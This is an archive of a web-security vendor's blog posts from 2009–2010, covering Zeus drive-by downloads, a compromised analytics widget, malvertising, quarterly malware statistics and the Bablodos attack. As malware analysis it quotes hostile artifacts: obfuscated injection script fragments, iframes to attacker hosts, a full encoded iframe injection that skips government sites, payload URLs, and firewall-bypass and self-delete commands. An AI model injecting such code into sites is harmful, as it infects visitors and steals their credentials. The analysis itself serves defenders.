Dasient Blog

Something to consider: How much traffic do malware-ridden "parked domains" really get?

2010-08-17T14:16:00.000-07:00

Over the past few days, there have been widespread reports that parked domains hosted by Network Solutions have been serving up malware, probably for several months. We are definitely glad to see that there is a growing awareness of the threat of web-based malware due to widgets, but one question that seems to be unanswered here is: “what is the true impact of this threat, when compared to say popular widgets or infected web applications?”

In our research at Dasient, we have seen that when popular traffic or audience measurement widgets get infected, for instance, thousands of top-ranked sites can be turned into malware distribution vehicles, and infect hundreds of thousands or millions of users. This begs the question: how much traffic would 500k ‘parked domains’ really get, and how many users are truly infected?

According to Richard Kershaw’s search and affiliate marketing blog, parked domains do not receive much traffic at all. In a July 2009 study Richard wrote:

“1,822,377 domains are parked with Sedo, says DomainTools.com as of 8 July 2009… Sedo’s most recent stats show a mere 25 domains get traffic in double digit per day. By the time we hit domain number 26 in their rankings, we’re in single digits... So 0.001% of domains parked with Sedo get double digit per day traffic. Or to put it another way, 99.999% of domains parked with Sedo don’t hit double digits daily.”

The overwhelming majority of parked domains do not get any traffic on a daily basis, which means that only a limited number of Internet users were impacted by the malware being served at Network Solutions. (Certainly, that may be why the problem was not even noticed for a few months.) In addition, according to Brian Krebs in his latest blog post on the matter, “One potentially limiting factor in this attack was that it seemed to target Chinese Web surfers,” which would further reduce the impact of this attack on end users.

To further underscore the issue here, one should contrast this with the information Dasient published regarding a widget attack against a major traffic and audience measurement provider in May, in which some very large Quantcast 100 sites were impacted, in addition to thousands of other legitimate websites that have significant user base.

Another more impactful example of web-based malware propagation is Gumblar which was a more significant attack as it hijacked many diverse sites (over 80,000 confirmed and distinct sites), and was much more persistent due to its architecture in which it would compromise diverse web sites via stolen FTP credentials, infect clients to steal more FTP credentials, and, in turn, compromise more diverse web sites. In fact, even after six months after the initial outbreak of Gumblar in May 2009, it continued to infect web servers, and there was no "easy" mitigation (like commenting the widget out of a single parked domain template). Also, our research at Dasient concludes that malvertising impacts many more users on a daily basis (1.3 million page views, by our estimates).

So while it’s good that malware found in third-party widgets is being identified and discussed in the community, it is important to look at such attacks in perspective and focus the discussions on the threats that actually have a real impact on businesses and users. Malware injected onto parked domains is unlikely to have the scale and reach of attacks against legitimate websites, such as the Gumblar attack or attacks against widgets used by legitimate websites.

At Dasient, we have been publishing information about the threat of web-based malware and its impact on businesses and users since 2009. We look forward to continuing to share the latest information from our research over the coming weeks and months.

More Zeus via drive-by, now improved with targeted phishing against banks

2010-06-23T16:20:00.000-07:00

By Tufan Demir, Neil Daswani, Rajesh G.

Date first added to infection library: June 8, 2010
Infection library link: http://wam.dasient.com/wam/infection_library/cdc7f46229a8abfcad40538bfe08f1bd

The Zeus botnet has been spreading via drive-by-download since late last year (e.g. http://www.scmagazineus.com/zeus-spreading-through-drive-by-download/article/158691/), but as they say in the security community -- attacks only get better. In such previous cases, the goal of the drive-by-download was singular: have the infected client machine join the Zeus botnet and await further instructions. Dasient's researchers (using data from Dasient's telemetry systems) not only see Zeus malware continue to be distributed via drive-by-download, but such malware also has a second purpose: to distribute targeted phishing kits against the financial sector, including banks such as Citibank and HSBC. After joining the Zeus botnet, an infected machine will start keystroke logging to phish user credentials for banking web sites when the user casually visits bank home pages. In the following, we describe the technical details.

The combined Zeus/phishing kit malware drive-by-download is distributed via the malicious domain gate4ads.info (although other domains have been used as well). The gate4ads.info domain serves a malicious iframe that appears as follows on infected web pages:


<body><script language='javascript' type='text/javascript'>
var oVoid='oVoid'.substring(42997, 42997);
var yWord;
function jArcG(jArcG){return 'jArcG'};
yWord='%6b%60%68%69...

This script appears differently on each infected domain. Here's another example of the script:


<body class="dc-home"><script language='javascript' type='text/javascript'>
this.wordOn=53159;
var cEnvCont;
var pakCon='pakCon'.substring(3674, 3674);
cEnvCont='%bd%bd%bd%bb...

Even though the malicious script is polymorphic, its behavior doesn't change. It creates the following malicious iframe:


<iframe frameborder=0 src='http://gate4ads.info/t/'>

This iframe in turn creates another iframe:


<iframe src='http://itspitsp.com/elleO_o_/index.php?s=[random chars]&[random chars]' width=[random num] height=[random num] frameborder='0'>

The Malware Behavior

The binary that comes down to the user's machine is called updates.exe, and is placed in the temp folder on the user's machine:

http://www.virustotal.com/analisis/af6288cab4f0b0351ffc01a8a8386d476f423f590be47cc85c54850cc6dbf642-1276130170

The binary replaces C:\WINDOWS\system32\sdra64.exe with the new file "updates.exe" and creates a registry entry to enable it to start automatically on reboot. Creating such a registry entry is a common technique that attackers use to make sure their malware always runs even when the user reboots their machine.

This executable attempts to get the PC to join the Zeus botnet.
http://anubis.iseclab.org/?action=result&task_id=176041d5651e7ef84299f5ddb50a8b1f1&format=html

It gets the configuration file from this url:
itspitsp.com/zeusO_o_/conf13.bin

This configuration file is in encrypted format. The virus decrypts it with the key hidden in its body. The decrypted configuration file tells the virus which bank sites to monitor. When the user visits one of the following urls, the virus will intercept the traffic and present a fake webpage to steal user credentials such as account number, user id and password, transaction numbers etc. The stolen information is logged and delivered to a drop site at a later point in time.

The list of banks that are being targeted:

1. http://internetbanking.gad.de/banking/
2. http://hsbc.co.uk
3. http://www.mybank.alliance-leicester.co.uk
4. http://www.citibank.de

Source of Attack

gate4ads. info is registered in Netherlands.

Domain ID:D33147654-LRMS
Domain Name:GATE4ADS.INFO
Created On:01-Jun-2010 04:39:28 UTC
Last Updated On:01-Jun-2010 18:45:48 UTC
Expiration Date:01-Jun-2011 04:39:28 UTC
Sponsoring Registrar:Directi Internet Solutions Pvt. Ltd. dba PublicDomainRegistry.com
(R159-LRMS)
Status:CLIENT TRANSFER PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:PP-SP-001
Registrant Name:Domain Admin
Registrant Organization:PrivacyProtect.org
Registrant Street1:P.O. Box 97
Registrant Street2:Note - All Postal Mails Rejected, visit Privacyprotect.org
Registrant Street3:
Registrant City:Moergestel
Registrant State/Province:
Registrant Postal Code:5066 ZH
Registrant Country:NL
Registrant Phone:+45.36946676
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:

The domain itspitsp.com resolves to a server hosted in China:

Domain name: itspitsp.com
Status: Active

Protection Status: public
( make contact info private at http://www.now.cn/domain/domainPrivate.php )

Registrant:
Name: itspitsp.com
Address: Volodarskiy
City: undefined
Province/state: IZJEVSK
Country: CN
Postal Code: 519000

Administrative Contact:
Name: itspitsp.com
Organization: itspitsp.com
Address: Volodarskiy
City: undefined
Province/state: IZJEVSK
Country: CN
Postal Code: 519000
Phone: +84.7562425583
Fax: +84.5762425583
Email:

Summary

The gate4ads .info attack is novel in that it propagates a virus with dual purposes: (1) adding end user PCs to the Zeus botnet, and (2) distributing targeted phishing and keystroke logging attacks against the financial sector. Also noteworthy is that the malware infection planted on websites is polymorphic in nature-- the javascript "attack string" injected onto each compromised legitimate website is different than the others. Thus, a signature-based approach for identifying the malware infection on websites would not succeed. Dasient's malware analysis engine, which primarily uses behavioral-based technology, identifies such malware infections every time.

According to Google, the gate4ads .info site was involved in infecting 642 other sites. (http://google.com/safebrowsing/diagnostic?site=gate4ads.info&hl=en). All of these sites, were they leveraging Dasient's Web Anti-Malware (WAM) monitoring and remediation services, would have been able to identify and contain this malware attack prior to getting blacklisted by Google. More importantly, the sites would have been able to protect their users from being infected with the virus that would add their PC to the Zeus botnet and keystroke log their banking passwords.

Financial institutions are specifically at risk from the gate4ads .info attack. If this attack was able to successfully penetrate the website of one of the banks being targeted with the keystroke logging, then all of that bank's users would be at risk for having their credentials stolen. Clearly, this would be a major security breach for the bank, and would allow the attackers to compromise large numbers of user accounts. Also as important, if it was discovered that a bank's website was compromised and was serving malware, this would result in major brand and reputation losses for the bank.

Dasient provides specific services for banks and financial institutions to secure them from web-based malware attacks. For more details, visit http://wam.dasient.com/wam/products_overview.

Third-party JavaScript widget discovered to be infected with malware

2010-06-04T16:20:00.000-07:00

Potentially thousands of legitimate websites that embed the widget are serving malware to their users.

Many websites use third-party JavaScript widgets for counting traffic, tracking users, sharing content, displaying video, enabling polls, and providing other user functionality. The use of third-party widgets has enabled rich user functionality and analytics. However, as noted by Jeremiah Grossman in his blog post "Web 2.0 pivot attacks", in a security context, websites that use third-party widgets "essentially allow arbitrary executable code, supplied by a third party, complete access to the web page DOM and the user’s session information." This could, of course, be used to infect the website’s users with malware. Tom Stripling also discusses the dangers of third-party JavaScript widgets, as well as user contributed content.

In a research paper published by Google titled “The Ghost in the Browser,” researchers claimed that third-party widgets were one of the primary vectors of attack for a website to get infected with malware.

We identified a free statistics counter that operated fine for almost four years, “when the nature of the counter changed and instead of cataloging the number of visitors, it started to exploit every user visiting pages linked to the counter… In this particular case, the user visited a completely unrelated web site that was hosting a third-party web counter. The web counter was benign for over four years and then drastically changed behavior to exploit any user visiting the site. This clearly demonstrates that any delegation of web content should only happen when the third party can be trusted.”

Just this past weekend, the Dasient security research team identified a third-party JavaScript widget that was responsible for infecting web users at a large Quantcast 100 website. The third-party widget in question was from a reputable market research and analytics firm, and the widget was used for traffic analysis and audience demographics. (Our team has been in contact with the Quantcast 100 website, and is also reaching out to the widget provider in order to help resolve this problem.)

This third-party JavaScript code was included among a number of other tracking tags present on several thousand URLs of the Quantcast 100 website. The JavaScript code (after being anonymized) is as follows:


// xxxxxx tagging
XXXX.require('//secure-us.xxxxxxxxxxxx.com/xxx.js', function () {
    var trac = nol_t({
        cid: 'xx-xxxxxxx',
        content: '0',
        server: 'secure-us'
    });
    trac.record().post();
});

In turn, http://secure-us.xxxxxxxxxxxx.com/xxx.js served the following complicated JavaScript code:


function NolTracker(b,a){this.pvar=b;this.mergeFeatures(a)}function nol_t(b,a){return new NolTracker(b,a)}NolTracker.prototype.version="6.0.9";NolTracker.prototype.scriptName=(function(){try{var b=document.getElementsByTagName("script");var c=b[b.length-1].getAttribute("src").match(/[^\/]*$/)}catch(a){}return c||"xxx.js"})...

At the end of the complex JavaScript was a malicious iframe sourcing in content from:
http://94. 75. 210. 6/measure/

What is notable about the attack above is that the JavaScript code is so complex, it would be difficult for even a technical person to parse the code quickly and identify the malicious iframe at the end. Furthermore, the attackers have used the pathname "measure" on the malicious domain in an effort to further obfuscate their attack. As a result, a technical person who was investigating the cause of the malware might not pay attention to the iframe; he or she could easily assume that this was part of the legitimate JavaScript code that was measuring user traffic on the website.

The attackers compromised this third-party analytics provider's JavaScript code and embedded the malicious iframe. A quick search on Google for the JavaScript code showed over 19,000 results of websites which contained this provider's analytics code. Thus, the attackers were able to stripe their web-based malware over thousands and thousands of legitimate websites (including multiple Quantcast 100 websites) by infecting the third-party analytics provider's JavaScript code with the malicious iframe.

There is a significant implication for web businesses. The "widgetization" of the web will continue to create opportunities such as the one detailed in this post for attackers to infect legitimate websites with malware. Any third-party code included in a legitimate website can be compromised and exploited to serve malware. In fact, the attackers have an incentive to infect these JavaScript widgets as a way to achieve scale and get "back door access" to popular websites. The concern for web businesses is that, despite all of the security operations and software development practices that they may have in place, there are dependencies on third-parties for rendering functionality on web pages on their site. And a particular web business has no control over the security practices of the third-party partner, which can get compromised, as was evident from the attack described above.

It is unrealistic to believe that web businesses will be able to remove all third-party software and JavaScript code from their websites. The "widgetization" of the web will only accelerate, as the trend towards distributed software development, interactivity, and combining best-of-breed software and widgets continues. Despite a web business having significant preventative security measures in place, its website is vulnerable to serving malware due to the use of third-party JavaScript widgets. Therefore, it is critical that web businesses monitor their websites (and thus their third-party JavaScript widget providers) for malware on a regular basis. An attack where a reputable partner gets compromised and infected with malware could happen any time, and it is important that the web business can respond immediately if such an attack occurs. Otherwise, the web business is at risk of serving malware to its users, which would result in users getting infected with malware; significant losses of brand, reputation, and revenue; and potential liability issues. Companies can use Dasient's Web Anti-Malware (WAM) monitoring service to defend their websites against the prospect of third-party widgets getting infected with malware.

Q1'10 web-based malware data and trends

2010-05-10T14:48:00.000-07:00

Each quarter we pull together data for web-based malware attacks from across the web. Our proprietary malware analysis platform allows us to monitor millions of websites and draw results from a wealth of data which we summarize in this blog. What we continue to see is that the web malware threat continues to grow significantly. Hackers are becoming increasingly sophisticated and bold in their attacks, which means that legitimate websites are more threatened than ever. Putting web site security best practices in place such as malware monitoring and containment is becoming an absolute must if businesses do not want to expose themselves and their customers to these attacks. A particularly interesting observation has been an increase in 'malvertising' attacks in which hackers plant malicious ads on high-profile ad networks and websites. We'll dig deeper into that but first, let's take a look at some of our results:

The Q1 2010 Data

In Q1 2010, we estimate that over 720,000 web sites were infected. While this number is significantly higher than our previous estimate of 560,000 infected web sites during Q4 2009, we also improved our methodology based on new telemetry from scanning a larger number of sites on the Internet and that accounts for infected sites that were previously not included.

This number does not only include small to medium sites getting infected, but also larger, high-profile websites (including Fortune 500 companies). Larger sites are desirable targets because of their high volume of traffic. It's much more convenient for an attacker to compromise an existing site than to try and build web traffic to a site they set up from scratch.

The challenge for websites is that there are many different ways for them to get infected. For example, a site that uses a javascript widget that is hosted externally could be at risk for getting compromised with web-based malware, as discussed in a Google report. Or publishers, blogs and other content providers that use third-party ad networks are at risk of having malvertisements introduced to their users on their site. Many sites (large and small) also rely on third-parties to provide packaged software that powers applications on their website. Examples include content management systems, blogging software, web server software, etc. It is often difficult for websites to constantly keep the software running their site up-to-date and patched to the latest version. Keeping server side web applications up-to-date is just as or even more challenging than keeping client side software up-to-date and patched. Even patched applications have vulnerabilities, which emphasizes the need for malware monitoring to mitigate risk due to both known and unknown vulnerabilities in web applications. In fact, in April there was a mass attack on Wordpress where attackers exploited a vulnerability to infect thousands of websites with malware.

As part of our quarterly malware update, we performed a study of a large pool of websites where we identified the risk factors on those sites that may contribute to malware infections. The results were surprising. We found that 97% of Fortune 500 web sites are at a high risk of getting infected with malware due to external partners (such as javascript widget providers, ad networks, and/or packaged software providers). In fact, Fortune 500 web sites have such a high risk because 69% of them use external Javascript to render portions of their sites and 64% of them are running outdated web applications. (We will be publishing a more in-depth study of malware-specific vulnerabilities on websites in the future.)

On a side note: We launched a new service in Q1 called the Dasient Malware Risk Assessment which allows us to run risk profiles on our customers, giving them information on where they are most exposed to web malware. We obtained the above-mentioned results by running our Malware Risk Assessment on a significant number of industry-specific web sites. If any of you are interested in running such an assessment on your web site, please fill in the form and we'll get you started.

Getting back to our statistics: reinfection rates decreased slightly from 42.4% to 40.5%; although, in general, the probability that a web site will get re-infected is still very high. And, of course, higher re-infection rates mean the site has a higher likelihood of suffering from loss of traffic, a decline in revenue, and damage to brand equity.

The average number of processes that infected web sites start on compromised machines is 3.03 (up from 2.8). Although a little higher than last quarter this is still indicative to us that attackers are getting smarter about the way they structure their attacks, opting for a smaller fingerprint on an infected machine, as historically attackers have started up to a dozen or more new processes on machines they compromise.
23.8% of new processes started due to drive-by-downloads had one character filenames such as “a.exe” or “f.exe”.

Attackers prefer to use “.com” domains to host malware. “.com” was the most popular followed by “.cn”. The domain “dnparking.com” was an attacker site used to infect a relatively large number of sites early in the quarter.

ASP, HTML, and PHP pages were the most infected in that order. The combined number of ASP and PHP pages infected shows an increase in dynamic content being infected this quarter which once again emphasizes the growing complexity in web sites and web applications.

Uptick in Anti-Malvertising attacks in Q1

One of the major trends observed is the spike in malvertising attacks since the beginning of 2010.
While content and feature-rich advertisements have been used on the web for some time, attackers are investing more in using them as a channel to distribute drive-by malware downloads.

Viruses and other malware were found to be lurking in ads on high-profile sites like The New York Times, Drudge Report.com, TechCrunch and WhitePages.com as well as by big ad delivery platforms such as Yahoo, Fox and Google.

We thought it may be useful to describe how malvertising attacks work, in general. In a typical attack, the hacker signs up to place an ad on a victim ad network (often using a stolen credit card), or compromises the credentials of an existing advertiser on an ad network. If the attacker signs up for a new account with an ad network, the attacker often places a legitimate-looking ad first, and switches it for a malicious ad once the attacker "gains trust" with the ad network. As some ad networks have stricter policies and/or vetting processes around the posting of ads for relatively new advertisers, some attackers simply compromise the login credentials of already existing, legitimate advertisers.

Given that so much of the web is monetized via advertising streams, it is a wonder that malvertising attacks aren't worse than they are, and the malvertising attacks over the past few weeks could be a harbinger of the growing threat to online advertising commerce.

Now that we have discussed high-level trends from the update, let's take a closer look at what the malware does once it is downloaded to a user's PC.

What is the Malware doing?

In many cases, the malware was trying to join a botnet. Botnets are networks of PCs, which have been taken over by malware programs. What the botnet will end up doing depends on what the botnet 'master' wants it to do but usually it will hook processes to capture keystrokes, send email spam etc. Some of the more common mechanisms to conduct drive-by-downloads included taking advantage of Adobe PDF exploits, and encouraging users to click on socially engineered fake AV windows to initiate dangerous downloads. In particular the 'Zeus' botnet has become very widely spread. Netwitness, based in Herndon, VA, released a report highlighting the kind of havoc the malware can wreak. It documents a Zeus botnet that controlled nearly 75,000 computer in more than 2,400 organizations, including some large and reputable ones such as Merck, Juniper Networks and the Hollywood Studio Paramount Pictures. Over four weeks, the botnet was used to steal more than 68,000 log-in credentials, including thousands of Facebook log-ins and Yahoo email log-ins.

Another interesting observation from our research is how attackers interact with government web sites.

Cybercriminals not interested in CyberWar (yet?)

Attackers use automated scripts to query search engines to get lists of vulnerable sites, and then have their scripts automatically infect sites. Their scripts are typically not very discriminating about which sites they attack. Government-run web sites, for instance, are also likely to be attacked by these automated scripts. For example, last month a part of the Environmental Protection Agency's (EPA) web site was infected, and in May the US Treasury had three of its web sites hacked.

It seems, though, that the attackers conducting such attacks are purely in it for the money. One might imagine that inadvertently attacking certain government web sites might provoke a serious (even military) reaction. Hence, while the attackers want to distribute their malware for fun and profit, they want to stay away from starting an all-out cyberwar. Why do we say that? In some of the attacks that we track, we have seen JavaScript code such as the following, which attackers inject:

if (document.location.href.indexOf("gov") >= 0) {
} else {
  document.write("<div style="'display:none'">");
  document.write(unescape('%3Ciframe%20src%3Dhttp%3A//%6B%6F%74%73%2E%39%39%36%36%2E%6F%72%67:%39%37/%78%6F/%64%6B.html%20width=100%20height=0%3E%3C/iframe%3E'));
  document.write("</div>");
}

Basically, the code above says that if the web site attacked is a government web site, then DO NOT serve a malware drive-by-download. Otherwise, it happily generates an invisible frame on the page that pulls in malicious content onto the page which initiates a drive-by-download. What is interesting here is that while an attacker's script may automatically inject the code above into any website, the code is careful not to serve malware to visitors, including government employees, as doing so could be interpreted as an act of cyber-war. What is also interesting that the attackers could decide to launch a cyber-war at any time.

Summary

Based on our research, it is evident that the malware epidemic is growing rapidly. With cybercrime techniques getting more sophisticated every day, it is critical to educate businesses on how they can put safe security practices in place for their websites to protect their customers and their revenues. In order to make sure that their businesses are not exposed, web sites can mitigate their risk by monitoring their websites for malware regularly.

If you're a business owner and you'd like to learn more about how Dasient WAM can help protect your websites, head here. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out this page. And no matter who you are, please be sure to check out our Twitter feed for all the latest in web-based malware and general security news.

Keep your sites safe!
Your Dasient Team

Anatomy of the Bablodos drive-by-download attack

2010-03-03T16:34:00.000-08:00

Hackers have come to rely less on distributing malware via email
attachments, and have opted for infecting legitimate websites with
drive-by-downloads as the de facto way of more aggresssive
distribution. Just by loading an infected web page in a browser, a
virus can be downloaded to a computer without knowledge of the user.
The implications are often disastrous and range from reputation/brand
and revenue loss to data theft.

One particular attack stood out due to the number of exploits it
used and the number of processes it started -- it was quite "blatant".
While hackers often take steps to evade detection, Bablodos didn't
seem to bother. Based on Dasient's last malware report for 2009
the average number of extra processes initiated by hackers in Q4 '09
was just 2.8 -- enough for a downloader and perhaps one or
two pieces of malware. (As a comparison, in previous years,
a drive-by download would often initiate 10 or more
extra processes, ostensibly in an attempt to maximize the return from
each infected endpoint.) This shows us that attackers are getting
smarter about the way they structure their attacks, opting for a
smaller fingerprint on an infected machine in exchange for a greater
likelihood of evading detection.

Enter bablodos.com. This brazen attack took advantage of a large
number of different vulnerabilities on the user's computer, modified
personal firewall settings and then deleted itself off the disk after 5
seconds of starting as many as 8 processes. Obviously it wasn't trying to hide
anything and the goal was to cause as much damage as possible in a short amount of time.
Clearly, some of today's hackers aren't afraid of being detected.

So how exactly does this attack work?

STEP 1

Bablodos .com infects vulnerable sites by injecting obfuscated javascript code on their web pages.

Here is the first few bytes of the malicious JS snippet: "document.write(String.fromCharCode(60,116,97,98,108,101,32,98,111,114,100..."

This JS code sources in

bablodos .com/x/jar.jar
bablodos .com/counter/swf.swf
bablodos .com/counter/exe.php
bablodos .com/counter/pdf.php

to look for vulnerabilities in Flash and Pdf plugins and Java Runtime Environment.

STEP 2

Users visiting these victim sites get infected in the following way:

* An executable named file.exe is downloaded into the \Documents and Settings\%USER% folder, and run without the user's consent. It is classified as a downloader by many antivirus engines according to this Virustotal analysis.

* This executable bypasses the Windows Firewall by modifying the following registry key:
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

* Then it downloads additional malware and starts new processes as many as 8 into the temp folder that have file names comprised of 10 random character such as
SUHyAwDJUT.exe, AJvvOxjPBD.exe, YylDMSreSn.exe etc.

* To avoid detection, the downloaded malware is deleted from disk after starting execution with the command:
C:\WINDOWS\system32\cmd.exe /c timeout 5 && del %TEMP%\[10chars].exe

Since January of this year at least 50 sites have been hit by bablodos.com, some of which are:

123-real-estate-riverside .com
3rbytv .com
addisdimts .com
allmyanmar .com
ar-movies .blogspot.com
bellsnwhistles .com
cfusion .com
deskbeauty .com
dogtraininghealthcare .com
eetcorp .com
el34world .com
ericbae .com
faithfulnews .com
funinternet .net
games420 .com
ganoi .us
gdp .com
goldcoastsewing .com
goldmedaldeals .com
gospeladvocate .com
hamiltonknife .com
healthyhuman .net
hipforums .com
homeofourfathers .com
icarly-show .com
jerryswallpaper .com
jpickup .com
lyainc .com
maxeys .com
medicalartsschool .com
mideastreview .com
midorimiller .com
milwaukeenights .com
mjguide .com
mobilefull .com
npocu .org
patriotsbankmo .com
phuket-to-krabi .com
plentyofpuppies .com
pocketkittys .com
powertoolbattery .co.uk
scvan .org
shovelhead .us
tattoovirtual .com
thailandmagic .com
thailandsouthern .com
themes420 .com
travelbookingonline .com
tvgrounds .com
usa-battery .com
wallpapers2k .com

Had these sites been monitored by Dasient WAM they would have been alerted in real-time that the malware was on their site and they would have been able to contain the infection and prevent it from spreading.

Q4'09 web-based malware data and trends

2010-01-26T08:00:00.000-08:00

Ed. Note: The data in this post is drawn primarily from Dasient's proprietary malware analysis platform, which gathers data on web-based malware attacks from across the web, and in the last year has been used to help tens of thousands of site owners address their web-based malware issues.

As we reported last quarter, the way malware is being distributed is undergoing a fundamental shift, with more attackers focusing on "drive-by downloads" from legitimate sites that have been compromised, or from sites designed specifically for malicious purposes. In nearly all the variations on this kind of attack, no user action is required for the infection to occur, beyond loading the site in a browser -- and there are very few signs that malicious code has been downloaded.

There is perhaps no better illustration of this shift than the way malware was employed in the recent attack on Google and several other companies. One of the components of the attack involved spear-phishing one or more Google employees, with an aim of driving them to a site that then exploited a zero-day vulnerability in Internet Explorer 6 to download malware to those employees' computers. In previous years, such an attack would have solely made use of a malicious email attachment to compromise the target's computer; now, attackers are clearly opting to employ multiple vectors, including web-based methods.

Looking at the data for Q4'09

Based on the telemetry data we've gathered from the web, we estimate that more than 560,000 sites and approximately 5.5 million pages were infected in Q4'09, compared with more than 640,000 sites and 5.8 million pages in Q3'09. By the end of the year, we had identified more than 100,000 web-based malware infections.

Also in Q4'09, the infections on newly compromised sites of 10 pages or more spread to an average of 24% of those sites' pages, up from 19 percent the previous quarter. This increase helps account for the smaller drop in the number of infected pages for the quarter, relative to the drop in infected sites. In other words, we saw a more significant drop in the number of infected sites than we did in the number of infected pages because each infection tended to spread to a larger number of pages on each site.

Finally, we saw a reinfection rate of 42 percent for the quarter (compared with 39 percent in Q3'09), meaning that more than four of every 10 sites infected in the quarter were reinfected within a space of three months. And, of course, with each infection the site is likely to suffer a loss of traffic, a decline in revenue, and damage to brand equity.

While we clearly saw a slight dip in some of the key metrics in the quarter (and, more specifically, as we neared the end of the year), the macro trend still points to a steady and significant increase in this kind of activity. To cite just one indicator: The number of infected pages for the quarter, 5.5 million, is a substantial increase from data published by Microsoft in April 2009, which pegged the number of infected pages per quarter at a little more than 3 million.

Attackers getting smarter

Like most other kinds of attackers, purveyors of web-based malware have long since adopted basic social engineering techniques to maximize their chances of remaining undetected as they infect endpoints. We saw plenty of evidence confirming that trend in Q4'09: For example, the most common domains being sourced in the download of a malicious file included innocuous-looking names like "google-query.com," "netlinkenterprises.com," and "starktourism.com." Similarly, the file names most often used in drive-by downloads included things like "setup.exe," "update.exe" (which was used in the Google attack), and "install_flash_player.exe."

But we also saw some evidence that attackers are responding directly to industry efforts to curb the spread of web-based malware. One interesting example can be found in the average number of extra processes started when a drive-by download is initiated. In previous years, a drive-by download would often initiate 10 or more extra processes, ostensibly in an attempt to maximize the return from each infected endpoint. In response, the search providers and anti-virus vendors who scan the web for infected sites began using the number of extra processes initiated as a signal that the webpage might be malicious. But in Q4'09, the average number of extra processes initiated was just 2.8 -- enough for a downloader and perhaps one or two pieces of malware. Clearly, attackers are getting smarter about the way they structure their attacks, opting for a smaller fingerprint on an infected machine in exchange for a greater likelihood of evading detection.

Structural vulnerabilities still being exploited

It stands to reason that the increasing complexity in and interoperability between websites and web applications has played a significant role in the rise of web-based malware. After all, the more dynamic and sophisticated your pages or applications are, the more vulnerabilities there will be for attackers to exploit. The data for Q4'09 certainly bears that out: .php, .asp, and .aspx (all file types associated with dynamic web content) accounted for 55 percent of all compromised URLs in the quarter.

Of course, a closer look at the data reveals that file types associated with static pages, such as .html, .htm, and .shtml, accounted for 39.6 percent of the compromised URLs for the quarter. This suggests that attackers are still focused in no small part on exploiting structural vulnerabilities in the web to compromise legitimate sites -- vulnerabilities like sourced-in third-party content or applications; user-added content like comments, links, photos, and other files; and syndicated ad networks, among other things. There are no simple solutions for closing these kinds of vulnerabilities, something that all site owners who want to avoid being infected -- and potentially infecting their users and being blacklisted -- should bear in mind when considering the protections they employ.

Keeping your site safe

If you're a business owner and you'd like to learn more about how Dasient WAM can help protect your websites, head here. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out this page. And no matter who you are, please be sure to check out our Twitter feed at http://twitter.com/dasient for all the latest in web-based malware and general security news.

Dasient WAM monitoring and diagnostic services now OOB

2009-12-01T10:01:00.000-08:00

Some of you may have already seen our announcement earlier this morning, but for those of you who haven't: The Dasient Web Anti-Malware (WAM) monitoring and diagnostic services have graduated out of beta, and are now generally available. We've had an exciting few months since first launching these services, continuing to build out the scalability, reliability, and speed of our malware detection platform and proving its readiness with tens of thousands of beta customers. We're thrilled to be able to make these services generally available, so we can help even more businesses and site owners protect themselves from web-based malware.

With the graduation out of beta, we'll be introducing some new features. They include richer reporting tools that will provide customers with data on the number of URLs scanned each week, lists of all URLs scanned and attacks being checked for, and the latest web-based malware attacks Dasient has detected. They also include new account management features that will enable customers using Dasient WAM to protect multiple domains to manage all those domains using a single login.

Other new updates include significant upgrades to the overall speed and reliability of the Dasient WAM scanning technology, as well as the ability to scan customer sites for links to dangerous downloads that might be placed in user-generated content or in syndicated ads on those sites.

We've also launched a redesign of Dasient.com that features some new resources for current and potential customers. Head here to learn a little more about web-based malware and the threat it poses to businesses and site owners of all types and sizes. Or check out some of our customer testimonials, to hear firsthand how Dasient WAM helped them. We also have a new whitepaper on drive-by downloads and other web-based malware threats.

To learn more about how Dasient WAM can help you protect yourself from the threat of web-based malware -- and the attendant loss of traffic, decline in revenue, and damage to brand equity -- check out our product page.

Another step forward in the fight against malvertising

2009-11-25T09:15:00.001-08:00

Last week, Google announced that it will now be taking a zero-tolerance approach to dealing with advertisers that place ads that violate its terms of service, including malicious ads that can infect users with malware. Google had previously been removing these ads from its network as it identified them; it will now be permanently disabling the AdWords accounts of the advertisers that put those ads into its network. This new policy shift should force individual advertisers and affiliate to think twice before placing malicious ads with Google, but hopefully it will also start to make an impact in addressing the broader malvertising threat.

To provide some context, the quality and safety of ads has been a concern for users, publishers, advertisers, and technology companies since advertising first appeared on the web more than a dozen years ago. Some of the first ads embedded in webpages took the form of banners -- some of which were criticized for the bandwidth that they required when most of the world was still using dial-up modems to access the Internet, and for their "loudness."

As companies such as Sun and Netscape worked together to bring more interactive forms of content and ads to browsers, sandboxes like the Java Virtual Machine were introduced to protect users from potentially malicious interactive content. In parallel to the development of Java, other forms of interactivity were brought to market, including JavaScript, ActiveX, Flash, and Shockwave, and different levels of security and interactivity distinguish these technologies. Some of them leverage browser "plugins" that ran code natively and in an unrestricted fashion on the user's machine (such as ActiveX), while others employ sandboxes in an attempt to protect users (though not always effectively). Often, functionality wins out over security when developers are faced with the pressing market needs of advertisers and content publishers, leading to much more frequent uses of technologies that are more interactive but less safe than technologies that are less interactive but more safe.

As a result, we today have a world where attackers interested in harming users with malicious ads can take advantage a large variety of vulnerabilities in browsers, plugins, and operating systems to do so. Here at Dasient, we've seen a significant increase in the amount of malvertising activity in the last year, and have worked with a number of companies and site owners who have been impacted by it. Some of these sites' users were infected by malicious ads; others ended up on the unsafe-site blacklists maintained by search engines, browsers, and anti-virus companies. Either way, the sites ended up losing traffic, revenue, and brand equity because a malicious ad popped up on their site via a syndicated ad network.

We're optimistic that Google's new policy shift will inspire similar moves from other online ad syndicators, and that in turn the advertisers and affiliates who traffic in malicious ads will have fewer channels to distribute their wares. Some commentators are already arguing that it won't; that not everyone can afford to take Google's principled stand. We hope that's not the case, but either way, it'll likely take a long time to stamp this threat out altogether. In the meantime, businesses and site owners interested in protecting their users and their reputation on the web can take advantage of tools like Daisent Web Anti-Malware (WAM), which regularly monitors your site and provides you with immediate alerts and detailed diagnostic information as soon as an infection or a malicious ad is detected.

To learn more about Dasient WAM, check out this page. And for all the latest news on web-based malware and the security space in general, be sure to follow us on Twitter at http://twitter.com/dasient.

Structural vulnerabilities, and the importance of being prepared

2009-11-16T18:21:00.000-08:00

